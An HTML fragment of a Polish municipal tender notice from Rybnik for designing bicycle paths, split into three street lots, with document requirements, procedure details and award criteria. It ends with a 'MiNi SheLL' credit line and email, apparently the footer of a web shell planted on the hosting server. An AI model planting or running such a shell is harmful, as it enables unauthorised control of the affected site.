                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane na formularzu zgodnym z treścią załącznika nr 5 do SIWZ, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy.
2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami na formularzu zgodnym z treścią załącznika nr 6 do SIWZ.
3. Wykonawca, którego oferta zostanie najwyżej oceniona, na wezwanie Zamawiającego zobowiązany będzie złożyć oświadczenia i dokumenty podmiotu, na zdolności lub sytuację którego Wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu. Wykonawca zobowiązany będzie złożyć dokumenty tego podmiotu potwierdzające spełnianie warunków udziału w postępowaniu w zakresie zdolności lub sytuacji, na których Wykonawca polegał w celu wykazania spełniania tych warunków (dokumenty wskazane w pkt 1).
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz oferty.
2. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.
4. Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:
1) Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu
 i zawarcia umowy.
2) podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą  pełnomocnictwo do podpisania oferty.
5. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Zamawiający zamieści informacje, o których mowa w art. 86 ust. 5 ustawy w pliku o nazwie Zbiorcze zestawienie ofert na swojej stronie internetowej www.bip.um.rybnik.eu.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin opracowania dokumentacji</td><td>10</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>30</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający przewiduje możliwość zmiany terminu wykonania przedmiotu umowy w przypadku:
1)	przedłużenia terminu realizacji umowy w sytuacji, gdy uzyskanie przez Wykonawcę pozwoleń, uzgodnień i opinii niezbędnych do realizacji przedmiotu umowy zostanie wydane przez właściwe organy z przekroczeniem terminów ustawowych, a w przypadku braku terminu ustawowego, gdy oczekiwanie na wymagane uzgodnienia wynosi powyżej 30 dni od daty złożenia wniosku o ich wydanie, o czas przekroczenia wyżej podanego terminu. Na Wykonawcy spoczywa obowiązek udokumentowania Zamawiającemu daty złożenia wniosku oraz faktu pisemnego monitowania jego rozpatrzenia (minimum 1 raz na każde 14 dni wnioskowanego przez Wykonawcę terminu przedłużenia umowy) poprzez pismo, e-mail, fax. Przedłużenie czasu realizacji umowy możliwe jest o liczbę dni kalendarzowych przekroczenia terminu,
2)	przedłużenia terminu realizacji umowy w zakresie pełnienia nadzoru autorskiego o tyle dni, o ile przedłużona została realizacja robót budowlanych (powyżej zakładanych 30 miesięcy) na podstawie opracowanej dokumentacji.
2.	Podstawą przedłużenia terminu umownego jest zgłoszenie przez Wykonawcę sytuacji opisanych w ust. 1 w czasie ich wystąpienia ze wskazaniem przyczyny oraz z podaniem daty ich ponownego podjęcia, potwierdzone każdorazowo przez Zamawiającego w formie pisemnej. Zgłoszenia dokonane po upływie terminu wykonania umowy są bezskuteczne.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/03/2017, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Wykonanie projektu przebudowy istniejących dróg rowerowych oraz budowy nowych (ZRID) - ul. Góreckiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie projektu przebudowy istniejących dróg rowerowych oraz budowy nowych (ZRID): 
1)	ul. Góreckiego  przebudowa (ok. 950m)
a)	od Ronda Solidarności do przejazdu dla rowerzystów w rejonie Oś. Krakusa (ok. 320m)  dwukierunkowe ciągi pieszo  rowerowe po jednej stronie jezdni,
b)	od Ronda Orzepowickiego do Ronda ER (ok. 630m)  dwukierunkowe ciągi pieszo  rowerowe po jednej stronie jezdni. 
2)	ul. Góreckiego  budowa (ok. 1,500km): od przejazdu dla rowerzystów w rejonie Oś. Krakusa do Ronda Orzepowickiego  dwukierunkowa droga dla rowerów po jednej stronie jezdni.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 42<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin opracowania dokumentacji</td><td>10</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>30</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Projekt nowych dróg rowerowych (ZRID) - ul. Wielopolska<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie projektu nowych dróg rowerowych (ZRID) - ul. Wielopolska (ok. 2,470km): 
1)	od skrzyżowania z ulicą Mikołowską do wjazdu do Nadleśnictwa (Szkółka drzew) (ok. 250m)  dwukierunkowe ciągi pieszo  rowerowe po jednej stronie jezdni,
2)	od wjazdu do Nadleśnictwa (Szkółka drzew) do ul. Strąkowskiej (ok. 1,950km)  dwukierunkowa droga dla rowerów po jednej stronie jezdni,
3)	łącznik pomiędzy ul. Wielopolską oraz Pod Wałem przez istniejący obiekt mostowy na  rzece Ruda (ok. 270 m)  4 m ciąg pieszo-rowerowy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 42<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin opracowania dokumentacji</td><td>10</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>30</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>1.	Projekt nowych dróg rowerowych (ZRID) - ul. Mikołowska:  2.	Projekt scalenia przystanków autobusowych zlokalizowanych na jezdni ulicy Przemysłowej  i ulicy Mikołowskiej w jeden obsługujący oba kierunki ruchu do centrum miasta,  3.	Zaprojektowanie i wykonanie rozwiązania przebudowy skrzyżowania ulic Mikołowska  Przemysłowa.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie: 
1)	projektu nowych dróg rowerowych (ZRID) - ul. Mikołowska: od miejsce zakończenia ciągu pieszo  rowerowego w rejonie stacji paliw do skrzyżowania z ulicą Wielopolską (ok. 1,200km)  jednokierunkowe ciągi pieszo  rowerowe zamiennie z chodnikiem i jednokierunkową droga rowerową lub pasami rowerowymi w zależności od warunków w danej lokalizacji po obu stronach jezdni, w szczególności (w przypadku niekorzystnych warunków terenowych dopuszcza się zawężenie jezdni do szerokości pasów zgodnie z minimum wymaganym w ustawie Prawo o ruchu drogowym),
2)	projektu scalenia przystanków autobusowych zlokalizowanych na jezdni ulicy Przemysłowej  i ulicy Mikołowskiej w jeden obsługujący oba kierunki ruchu do centrum miasta, którego wstępną lokalizację wyznacza się za zjazdem do budynku stacyjnego PKP Rybnik Paruszowiec w rejonie budynku Mikołowska 59,
3)	zaprojektowanie i wykonanie rozwiązania przebudowy skrzyżowania ulic Mikołowska  Przemysłowa uwzględniającego właściwe warunki geometryczne i ruchowe prognozowane na okres 20 letni w dwóch wariantach.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 42<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin opracowania dokumentacji</td><td>10</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>30</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com